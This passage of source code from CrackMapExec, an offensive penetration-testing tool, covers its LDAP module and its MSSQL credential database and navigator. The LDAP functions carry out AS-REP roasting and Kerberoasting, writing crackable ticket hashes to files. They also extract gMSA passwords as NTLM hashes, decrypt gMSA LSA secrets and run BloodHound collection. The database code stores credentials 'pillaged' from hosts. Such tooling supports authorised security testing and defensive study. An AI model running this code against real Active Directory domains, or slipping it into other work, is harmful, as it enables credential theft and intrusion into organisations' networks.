t /= 10000000
return t
def search(self, searchFilter, attributes, sizeLimit=0):
try:
if self.ldapConnection:
self.logger.debug(f"Search Filter={searchFilter}")
# Microsoft Active Directory set an hard limit of 1000 entries returned by any search
paged_search_control = ldapasn1_impacket.SimplePagedResultsControl(criticality=True, size=1000)
resp = self.ldapConnection.search(
searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit,
searchControls=[paged_search_control],
)
return resp
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find("sizeLimitExceeded") >= 0:
# We should never reach this code as we use paged search now
self.logger.fail("sizeLimitExceeded exception caught, giving up and processing the data received")
resp = e.getAnswers()
pass
else:
self.logger.fail(e)
return False
return False
def users(self):
# Building the search filter
search_filter = "(sAMAccountType=805306368)" if self.username != "" else "(objectclass=*)"
attributes = [
"sAMAccountName",
"description",
"badPasswordTime",
"badPwdCount",
"pwdLastSet",
]
resp = self.search(search_filter, attributes, sizeLimit=0)
if resp:
answers = []
self.logger.display(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ""
badPasswordTime = ""
badPwdCount = 0
description = ""
pwdLastSet = ""
try:
if self.username == "":
self.logger.highlight(f"{item['objectName']}")
else:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
elif str(attribute["type"]) == "description":
description = str(attribute["vals"][0])
self.logger.highlight(f"{sAMAccountName:<30} {description}")
except Exception as e:
self.logger.debug(f"Skipping item, cannot process due to error {e}")
pass
return
def groups(self):
# Building the search filter
search_filter = "(objectCategory=group)"
attributes = ["name"]
resp = self.search(search_filter, attributes, 0)
if resp:
answers = []
self.logger.debug(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
name = ""
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "name":
name = str(attribute["vals"][0])
self.logger.highlight(f"{name}")
except Exception as e:
self.logger.debug("Exception:", exc_info=True)
self.logger.debug(f"Skipping item, cannot process due to error {e}")
pass
return
def dc_list(self):
# Building the search filter
search_filter = "(&(objectCategory=computer)(primaryGroupId=516))"
attributes = ["dNSHostName"]
resp = self.search(search_filter, attributes, 0)
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
name = ""
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "dNSHostName":
name = str(attribute["vals"][0])
try:
ip_address = socket.gethostbyname(name.split(".")[0])
if ip_address != True and name != "":
self.logger.highlight(f"{name} =", ip_address)
except socket.gaierror:
self.logger.fail(f"{name} = Connection timeout")
except Exception as e:
self.logger.fail("Exception:", exc_info=True)
self.logger.fail(f"Skipping item, cannot process due to error {e}")
def asreproast(self):
if self.password == "" and self.nthash == "" and self.kerberos is False:
return False
# Building the search filter
search_filter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" "(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
attributes = [
"sAMAccountName",
"pwdLastSet",
"MemberOf",
"userAccountControl",
"lastLogon",
]
resp = self.search(search_filter, attributes, 0)
if resp == []:
self.logger.highlight("No entries found!")
elif resp:
answers = []
self.logger.display(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ""
memberOf = ""
pwdLastSet = ""
userAccountControl = 0
lastLogon = "N/A"
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
mustCommit = True
elif str(attribute["type"]) == "userAccountControl":
userAccountControl = "0x%x" % int(attribute["vals"][0])
elif str(attribute["type"]) == "memberOf":
memberOf = str(attribute["vals"][0])
elif str(attribute["type"]) == "pwdLastSet":
if str(attribute["vals"][0]) == "0":
pwdLastSet = ""
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
elif str(attribute["type"]) == "lastLogon":
if str(attribute["vals"][0]) == "0":
lastLogon = ""
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
if mustCommit is True:
answers.append(
[
sAMAccountName,
memberOf,
pwdLastSet,
lastLogon,
userAccountControl,
]
)
except Exception as e:
self.logger.debug("Exception:", exc_info=True)
self.logger.debug(f"Skipping item, cannot process due to error {e}")
pass
if len(answers) > 0:
for user in answers:
hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
self.logger.highlight(f"{hash_TGT}")
with open(self.args.asreproast, "a+") as hash_asreproast:
hash_asreproast.write(hash_TGT + "\n")
return True
else:
self.logger.highlight("No entries found!")
return
else:
self.logger.fail("Error with the LDAP account used")
def kerberoasting(self):
# Building the search filter
searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" "(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
attributes = [
"servicePrincipalName",
"sAMAccountName",
"pwdLastSet",
"MemberOf",
"userAccountControl",
"lastLogon",
]
resp = self.search(searchFilter, attributes, 0)
if not resp:
self.logger.highlight("No entries found!")
elif resp:
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ""
memberOf = ""
SPNs = []
pwdLastSet = ""
userAccountControl = 0
lastLogon = "N/A"
delegation = ""
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
mustCommit = True
elif str(attribute["type"]) == "userAccountControl":
userAccountControl = str(attribute["vals"][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = "unconstrained"
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = "constrained"
elif str(attribute["type"]) == "memberOf":
memberOf = str(attribute["vals"][0])
elif str(attribute["type"]) == "pwdLastSet":
if str(attribute["vals"][0]) == "0":
pwdLastSet = ""
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
elif str(attribute["type"]) == "lastLogon":
if str(attribute["vals"][0]) == "0":
lastLogon = ""
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
elif str(attribute["type"]) == "servicePrincipalName":
for spn in attribute["vals"]:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
self.logger.debug(f"Bypassing disabled account {sAMAccountName} ")
else:
for spn in SPNs:
answers.append(
[
spn,
sAMAccountName,
memberOf,
pwdLastSet,
lastLogon,
delegation,
]
)
except Exception as e:
cme_logger.error(f"Skipping item, cannot process due to error {str(e)}")
pass
if len(answers) > 0:
self.logger.display(f"Total of records returned {len(answers):d}")
TGT = KerberosAttacks(self).getTGT_kerberoasting()
dejavue = []
for (
SPN,
sAMAccountName,
memberOf,
pwdLastSet,
lastLogon,
delegation,
) in answers:
if sAMAccountName not in dejavue:
downLevelLogonName = self.targetDomain + "\\" + sAMAccountName
try:
principalName = Principal()
principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value
principalName.components = [downLevelLogonName]
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(
principalName,
self.domain,
self.kdcHost,
TGT["KDC_REP"],
TGT["cipher"],
TGT["sessionKey"],
)
r = KerberosAttacks(self).outputTGS(
tgs,
oldSessionKey,
sessionKey,
sAMAccountName,
self.targetDomain + "/" + sAMAccountName,
)
self.logger.highlight(f"sAMAccountName: {sAMAccountName} memberOf: {memberOf} pwdLastSet: {pwdLastSet} lastLogon:{lastLogon}")
self.logger.highlight(f"{r}")
with open(self.args.kerberoasting, "a+") as hash_kerberoasting:
hash_kerberoasting.write(r + "\n")
dejavue.append(sAMAccountName)
except Exception as e:
self.logger.debug("Exception:", exc_info=True)
cme_logger.error(f"Principal: {downLevelLogonName} - {e}")
return True
else:
self.logger.highlight("No entries found!")
return
self.logger.fail("Error with the LDAP account used")
def trusted_for_delegation(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
attributes = [
"sAMAccountName",
"pwdLastSet",
"MemberOf",
"userAccountControl",
"lastLogon",
]
resp = self.search(searchFilter, attributes, 0)
answers = []
self.logger.debug(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ""
memberOf = ""
pwdLastSet = ""
userAccountControl = 0
lastLogon = "N/A"
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
mustCommit = True
elif str(attribute["type"]) == "userAccountControl":
userAccountControl = "0x%x" % int(attribute["vals"][0])
elif str(attribute["type"]) == "memberOf":
memberOf = str(attribute["vals"][0])
elif str(attribute["type"]) == "pwdLastSet":
if str(attribute["vals"][0]) == "0":
pwdLastSet = ""
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
elif str(attribute["type"]) == "lastLogon":
if str(attribute["vals"][0]) == "0":
lastLogon = ""
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
if mustCommit is True:
answers.append(
[
sAMAccountName,
memberOf,
pwdLastSet,
lastLogon,
userAccountControl,
]
)
except Exception as e:
self.logger.debug("Exception:", exc_info=True)
self.logger.debug(f"Skipping item, cannot process due to error {e}")
pass
if len(answers) > 0:
self.logger.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.fail("No entries found!")
return
def password_not_required(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
try:
self.logger.debug(f"Search Filter={searchFilter}")
resp = self.ldapConnection.search(
searchFilter=searchFilter,
attributes=[
"sAMAccountName",
"pwdLastSet",
"MemberOf",
"userAccountControl",
"lastLogon",
],
sizeLimit=0,
)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find("sizeLimitExceeded") >= 0:
self.logger.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
return False
answers = []
self.logger.debug(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ""
memberOf = ""
pwdLastSet = ""
userAccountControl = 0
status = "enabled"
lastLogon = "N/A"
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
mustCommit = True
elif str(attribute["type"]) == "userAccountControl":
if int(attribute["vals"][0]) & 2:
status = "disabled"
userAccountControl = f"0x{int(attribute['vals'][0]):x}"
elif str(attribute["type"]) == "memberOf":
memberOf = str(attribute["vals"][0])
elif str(attribute["type"]) == "pwdLastSet":
if str(attribute["vals"][0]) == "0":
pwdLastSet = ""
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
elif str(attribute["type"]) == "lastLogon":
if str(attribute["vals"][0]) == "0":
lastLogon = ""
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
if mustCommit is True:
answers.append(
[
sAMAccountName,
memberOf,
pwdLastSet,
lastLogon,
userAccountControl,
status,
]
)
except Exception as e:
self.logger.debug("Exception:", exc_info=True)
self.logger.debug(f"Skipping item, cannot process due to error {str(e)}")
pass
if len(answers) > 0:
self.logger.debug(answers)
for value in answers:
self.logger.highlight(f"User: {value[0]} Status: {value[5]}")
else:
self.logger.fail("No entries found!")
return
def admin_count(self):
# Building the search filter
searchFilter = "(adminCount=1)"
attributes = [
"sAMAccountName",
"pwdLastSet",
"MemberOf",
"userAccountControl",
"lastLogon",
]
resp = self.search(searchFilter, attributes, 0)
answers = []
self.logger.debug(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ""
memberOf = ""
pwdLastSet = ""
userAccountControl = 0
lastLogon = "N/A"
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
mustCommit = True
elif str(attribute["type"]) == "userAccountControl":
userAccountControl = "0x%x" % int(attribute["vals"][0])
elif str(attribute["type"]) == "memberOf":
memberOf = str(attribute["vals"][0])
elif str(attribute["type"]) == "pwdLastSet":
if str(attribute["vals"][0]) == "0":
pwdLastSet = ""
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
elif str(attribute["type"]) == "lastLogon":
if str(attribute["vals"][0]) == "0":
lastLogon = ""
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0])))))
if mustCommit is True:
answers.append(
[
sAMAccountName,
memberOf,
pwdLastSet,
lastLogon,
userAccountControl,
]
)
except Exception as e:
self.logger.debug("Exception:", exc_info=True)
self.logger.debug(f"Skipping item, cannot process due to error {str(e)}")
pass
if len(answers) > 0:
self.logger.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.fail("No entries found!")
return
def gmsa(self):
self.logger.display("Getting GMSA Passwords")
search_filter = "(objectClass=msDS-GroupManagedServiceAccount)"
gmsa_accounts = self.ldapConnection.search(
searchFilter=search_filter,
attributes=[
"sAMAccountName",
"msDS-ManagedPassword",
"msDS-GroupMSAMembership",
],
sizeLimit=0,
searchBase=self.baseDN,
)
if gmsa_accounts:
answers = []
self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}")
for item in gmsa_accounts:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ""
passwd = ""
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
if str(attribute["type"]) == "msDS-ManagedPassword":
data = attribute["vals"][0].asOctets()
blob = MSDS_MANAGEDPASSWORD_BLOB()
blob.fromString(data)
currentPassword = blob["CurrentPassword"][:-2]
ntlm_hash = MD4.new()
ntlm_hash.update(currentPassword)
passwd = hexlify(ntlm_hash.digest()).decode("utf-8")
self.logger.highlight(f"Account: {sAMAccountName:<20} NTLM: {passwd}")
return True
def decipher_gmsa_name(self, domain_name=None, account_name=None):
# https://aadinternals.com/post/gmsa/
gmsa_account_name = (domain_name + account_name).upper()
self.logger.debug(f"GMSA name for {gmsa_account_name}")
bin_account_name = gmsa_account_name.encode("utf-16le")
bin_hash = hmac.new(bytes("", "latin-1"), msg=bin_account_name, digestmod=hashlib.sha256).digest()
hex_letters = "0123456789abcdef"
str_hash = ""
for b in bin_hash:
str_hash += hex_letters[b & 0x0F]
str_hash += hex_letters[b >> 0x04]
self.logger.debug(f"Hash2: {str_hash}")
return str_hash
def gmsa_convert_id(self):
if self.args.gmsa_convert_id:
if len(self.args.gmsa_convert_id) != 64:
self.logger.fail("Length of the gmsa id not correct :'(")
else:
# getting the gmsa account
search_filter = "(objectClass=msDS-GroupManagedServiceAccount)"
gmsa_accounts = self.ldapConnection.search(
searchFilter=search_filter,
attributes=["sAMAccountName"],
sizeLimit=0,
searchBase=self.baseDN,
)
if gmsa_accounts:
answers = []
self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}")
for item in gmsa_accounts:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ""
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
if self.decipher_gmsa_name(self.domain.split(".")[0], sAMAccountName[:-1]) == self.args.gmsa_convert_id:
self.logger.highlight(f"Account: {sAMAccountName:<20} ID: {self.args.gmsa_convert_id}")
break
else:
self.logger.fail("No string provided :'(")
def gmsa_decrypt_lsa(self):
if self.args.gmsa_decrypt_lsa:
if "_SC_GMSA_{84A78B8C" in self.args.gmsa_decrypt_lsa:
gmsa = self.args.gmsa_decrypt_lsa.split("_")[4].split(":")
gmsa_id = gmsa[0]
gmsa_pass = gmsa[1]
# getting the gmsa account
search_filter = "(objectClass=msDS-GroupManagedServiceAccount)"
gmsa_accounts = self.ldapConnection.search(
searchFilter=search_filter,
attributes=["sAMAccountName"],
sizeLimit=0,
searchBase=self.baseDN,
)
if gmsa_accounts:
answers = []
self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}")
for item in gmsa_accounts:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ""
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = str(attribute["vals"][0])
if self.decipher_gmsa_name(self.domain.split(".")[0], sAMAccountName[:-1]) == gmsa_id:
gmsa_id = sAMAccountName
break
# convert to ntlm
data = bytes.fromhex(gmsa_pass)
blob = MSDS_MANAGEDPASSWORD_BLOB()
blob.fromString(data)
currentPassword = blob["CurrentPassword"][:-2]
ntlm_hash = MD4.new()
ntlm_hash.update(currentPassword)
passwd = hexlify(ntlm_hash.digest()).decode("utf-8")
self.logger.highlight(f"Account: {gmsa_id:<20} NTLM: {passwd}")
else:
self.logger.fail("No string provided :'(")
def bloodhound(self):
auth = ADAuthentication(
username=self.username,
password=self.password,
domain=self.domain,
lm_hash=self.nthash,
nt_hash=self.nthash,
aeskey=self.aesKey,
kdc=self.kdcHost,
auth_method="auto",
)
ad = AD(
auth=auth,
domain=self.domain,
nameserver=self.args.nameserver,
dns_tcp=False,
dns_timeout=3,
)
collect = resolve_collection_methods("Default" if not self.args.collection else self.args.collection)
if not collect:
return
self.logger.highlight("Resolved collection methods: " + ", ".join(list(collect)))
self.logger.debug("Using DNS to retrieve domain information")
ad.dns_resolve(domain=self.domain)
if self.args.kerberos:
self.logger.highlight("Using kerberos auth without ccache, getting TGT")
auth.get_tgt()
if self.args.use_kcache:
self.logger.highlight("Using kerberos auth from ccache")
timestamp = datetime.now().strftime("%Y-%m-%d_%H%M%S") + "_"
bloodhound = BloodHound(ad, self.hostname, self.host, self.args.port)
bloodhound.connect()
bloodhound.run(
collect=collect,
num_workers=10,
disable_pooling=False,
timestamp=timestamp,
computerfile=None,
cachefile=None,
exclude_dcs=False,
)
self.logger.highlight(f"Compressing output into {self.output_filename}bloodhound.zip")
list_of_files = os.listdir(os.getcwd())
with ZipFile(self.output_filename + "bloodhound.zip", "w") as z:
for each_file in list_of_files:
if each_file.startswith(timestamp) and each_file.endswith("json"):
z.write(each_file)
os.remove(each_file)
================================================
FILE: cme/protocols/mssql/__init__.py
================================================
================================================
FILE: cme/protocols/mssql/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from sqlalchemy import MetaData, func, Table, select, insert, update, delete
from sqlalchemy.dialects.sqlite import Insert # used for upsert
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.exc import SAWarning
import warnings
from cme.logger import cme_logger
# if there is an issue with SQLAlchemy and a connection cannot be cleaned up properly it spews out annoying warnings
warnings.filterwarnings("ignore", category=SAWarning)
class database:
def __init__(self, db_engine):
self.HostsTable = None
self.UsersTable = None
self.AdminRelationsTable = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
# this is still named "conn" when it is the session object; TODO: rename
self.conn = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute(
"""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"ip" text,
"hostname" text,
"domain" text,
"os" text,
"instances" integer
)"""
)
# This table keeps track of which credential has admin access over which machine and vice-versa
db_conn.execute(
"""CREATE TABLE "admin_relations" (
"id" integer PRIMARY KEY,
"userid" integer,
"hostid" integer,
FOREIGN KEY(userid) REFERENCES users(id),
FOREIGN KEY(hostid) REFERENCES hosts(id)
)"""
)
# type = hash, plaintext
db_conn.execute(
"""CREATE TABLE "users" (
"id" integer PRIMARY KEY,
"credtype" text,
"domain" text,
"username" text,
"password" text,
"pillaged_from_hostid" integer,
FOREIGN KEY(pillaged_from_hostid) REFERENCES hosts(id)
)"""
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
try:
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine)
self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.conn.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.conn.execute(table.delete())
def add_host(self, ip, hostname, domain, os, instances):
"""
Check if this host has already been added to the database, if not, add it in.
TODO: return inserted or updated row ids as a list
"""
cme_logger.debug(f"{domain} {ip} {os} {instances}")
if not domain:
domain = ""
hosts = []
q = select(self.HostsTable).filter(self.HostsTable.c.ip == ip)
results = self.conn.execute(q).all()
cme_logger.debug(f"mssql add_host() - hosts returned: {results}")
host_data = {
"ip": ip,
"hostname": hostname,
"domain": domain,
"os": os,
"instances": instances,
}
if not results:
hosts = [host_data]
else:
for host in results:
host_data = host._asdict()
if ip is not None:
host_data["ip"] = ip
if hostname is not None:
host_data["hostname"] = hostname
if domain is not None:
host_data["domain"] = domain
if os is not None:
host_data["os"] = os
if instances is not None:
host_data["instances"] = instances
if host_data not in hosts:
hosts.append(host_data)
cme_logger.debug(f"Update Hosts: {hosts}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.HostsTable)
update_columns = {col.name: col for col in q.excluded if col.name not in "id"}
q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)
self.conn.execute(q, hosts)
def add_credential(self, credtype, domain, username, password, pillaged_from=None):
"""
Check if this credential has already been added to the database, if not add it in.
"""
user_rowid = None
credential_data = {}
if credtype is not None:
credential_data["credtype"] = credtype
if domain is not None:
credential_data["domain"] = domain
if username is not None:
credential_data["username"] = username
if password is not None:
credential_data["password"] = password
if pillaged_from is not None:
credential_data["pillaged_from"] = pillaged_from
q = select(self.UsersTable).filter(
func.lower(self.UsersTable.c.domain) == func.lower(domain),
func.lower(self.UsersTable.c.username) == func.lower(username),
func.lower(self.UsersTable.c.credtype) == func.lower(credtype),
)
results = self.conn.execute(q).all()
if not results:
user_data = {
"domain": domain,
"username": username,
"password": password,
"credtype": credtype,
"pillaged_from_hostid": pillaged_from,
}
q = insert(self.UsersTable).values(user_data) # .returning(self.UsersTable.c.id)
self.conn.execute(q) # .first()
else:
for user in results:
# might be able to just remove this if check, but leaving it in for now
if not user[3] and not user[4] and not user[5]:
q = update(self.UsersTable).values(credential_data) # .returning(self.UsersTable.c.id)
results = self.conn.execute(q) # .first()
# user_rowid = results.id
cme_logger.debug(f"add_credential(credtype={credtype}, domain={domain}, username={username}, password={password}, pillaged_from={pillaged_from})")
return user_rowid
def remove_credentials(self, creds_id):
"""
Removes a credential ID from the database
"""
del_hosts = []
for cred_id in creds_id:
q = delete(self.UsersTable).filter(self.UsersTable.c.id == cred_id)
del_hosts.append(q)
self.conn.execute(q)
def add_admin_user(self, credtype, domain, username, password, host, user_id=None):
if user_id:
q = select(self.UsersTable).filter(self.UsersTable.c.id == user_id)
users = self.conn.execute(q).all()
else:
q = select(self.UsersTable).filter(
self.UsersTable.c.credtype == credtype,
func.lower(self.UsersTable.c.domain) == func.lower(domain),
func.lower(self.UsersTable.c.username) == func.lower(username),
self.UsersTable.c.password == password,
)
users = self.conn.execute(q).all()
cme_logger.debug(f"Users: {users}")
like_term = func.lower(f"%{host}%")
q = q.filter(self.HostsTable.c.ip.like(like_term))
hosts = self.conn.execute(q).all()
cme_logger.debug(f"Hosts: {hosts}")
if users is not None and hosts is not None:
for user, host in zip(users, hosts):
user_id = user[0]
host_id = host[0]
link = {"userid": user_id, "hostid": host_id}
q = select(self.AdminRelationsTable).filter(
self.AdminRelationsTable.c.userid == user_id,
self.AdminRelationsTable.c.hostid == host_id,
)
links = self.conn.execute(q).all()
if not links:
self.conn.execute(insert(self.AdminRelationsTable).values(link))
def get_admin_relations(self, user_id=None, host_id=None):
if user_id:
q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id)
elif host_id:
q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)
else:
q = select(self.AdminRelationsTable)
results = self.conn.execute(q).all()
return results
def remove_admin_relation(self, user_ids=None, host_ids=None):
q = delete(self.AdminRelationsTable)
if user_ids:
for user_id in user_ids:
q = q.filter(self.AdminRelationsTable.c.userid == user_id)
elif host_ids:
for host_id in host_ids:
q = q.filter(self.AdminRelationsTable.c.hostid == host_id)
self.conn.execute(q)
def is_credential_valid(self, credential_id):
"""
Check if this credential ID is valid.
"""
q = select(self.UsersTable).filter(
self.UsersTable.c.id == credential_id,
self.UsersTable.c.password is not None,
)
results = self.conn.execute(q).all()
return len(results) > 0
def get_credentials(self, filter_term=None, cred_type=None):
"""
Return credentials from the database.
"""
# if we're returning a single credential by ID
if self.is_credential_valid(filter_term):
q = select(self.UsersTable).filter(self.UsersTable.c.id == filter_term)
elif cred_type:
q = select(self.UsersTable).filter(self.UsersTable.c.credtype == cred_type)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term))
# otherwise return all credentials
else:
q = select(self.UsersTable)
results = self.conn.execute(q).all()
return results
def is_host_valid(self, host_id):
"""
Check if this host ID is valid.
"""
q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)
results = self.conn.execute(q).all()
return len(results) > 0
def get_hosts(self, filter_term=None, domain=None):
"""
Return hosts from the database.
"""
q = select(self.HostsTable)
# if we're returning a single host by ID
if self.is_host_valid(filter_term):
q = q.filter(self.HostsTable.c.id == filter_term)
results = self.conn.execute(q).first()
# all() returns a list, so we keep the return format the same so consumers don't have to guess
return [results]
# if we're filtering by domain controllers
elif filter_term == "dc":
q = q.filter(self.HostsTable.c.dc == True)
if domain:
q = q.filter(func.lower(self.HostsTable.c.domain) == func.lower(domain))
# if we're filtering by ip/hostname
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = select(self.HostsTable).filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term))
results = self.conn.execute(q).all()
return results
================================================
FILE: cme/protocols/mssql/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.helpers.misc import validate_ntlm
from cme.cmedb import DatabaseNavigator, print_table, print_help
class navigator(DatabaseNavigator):
def display_creds(self, creds):
data = [["CredID", "Admin On", "CredType", "Domain", "UserName", "Password"]]
for cred in creds:
links = self.db.get_admin_relations(user_id=cred[0])
data.append(
[
cred[0], # cred_id
str(len(links)) + " Host(s)",
cred[1], # cred_type
cred[2], # domain
cred[3], # username
cred[4], # password
]
)
print_table(data, title="Credentials")
def display_hosts(self, hosts):
data = [["HostID", "Admins", "IP", "Hostname", "Domain", "OS", "DB Instances"]]
for host in hosts:
links = self.db.get_admin_relations(host_id=host[0])
data.append(
[
host[0],
str(len(links)) + " Cred(s)",
host[1],
host[2],
host[3],
host[4],
host[5],
]
)
print_table(data, title="Hosts")
def do_hosts(self, line):
filter_term = line.strip()
if filter_term == "":
hosts = self.db.get_hosts()
self.display_hosts(hosts)
else:
hosts = self.db.get_hosts(filter_term=filter_term)
if len(hosts) > 1:
self.display_hosts(hosts)
elif len(hosts) == 1:
data = [["HostID", "IP", "Hostname", "Domain", "OS"]]
host_id_list = []
for host in hosts:
host_id_list.append(host[0])
data.append([host[0], host[1], host[2], host[3], host[4]])
print_table(data, title="Host(s)")
data = [["CredID", "CredType", "Domain", "UserName", "Password"]]
for host_id in host_id_list:
links = self.db.get_admin_relations(host_id=host_id)
for link in links:
link_id, cred_id, host_id = link
creds = self.db.get_credentials(filter_term=cred_id)
for cred in creds:
data.append([cred[0], cred[4], cred[1], cred[2], cred[3]])
print_table(data, title="Credential(s) with Admin Access")
def do_creds(self, line):
filter_term = line.strip()
if filter_term == "":
creds = self.db.get_credentials()
self.display_creds(creds)
elif filter_term.split()[0].lower() == "add":
args = filter_term.split()[1:]
if len(args) == 3:
domain, username, password = args
if validate_ntlm(password):
self.db.add_credential("hash", domain, username, password)
else:
self.db.add_credential("plaintext", domain, username, password)
else:
print("[!] Format is 'add domain username password")
return
elif filter_term.split()[0].lower() == "remove":
args = filter_term.split()[1:]
if len(args) != 1:
print("[!] Format is 'remove '")
return
else:
self.db.remove_credentials(args)
self.db.remove_links(credIDs=args)
elif filter_term.split()[0].lower() == "plaintext":
creds = self.db.get_credentials(cred_type="plaintext")
self.display_creds(creds)
elif filter_term.split()[0].lower() == "hash":
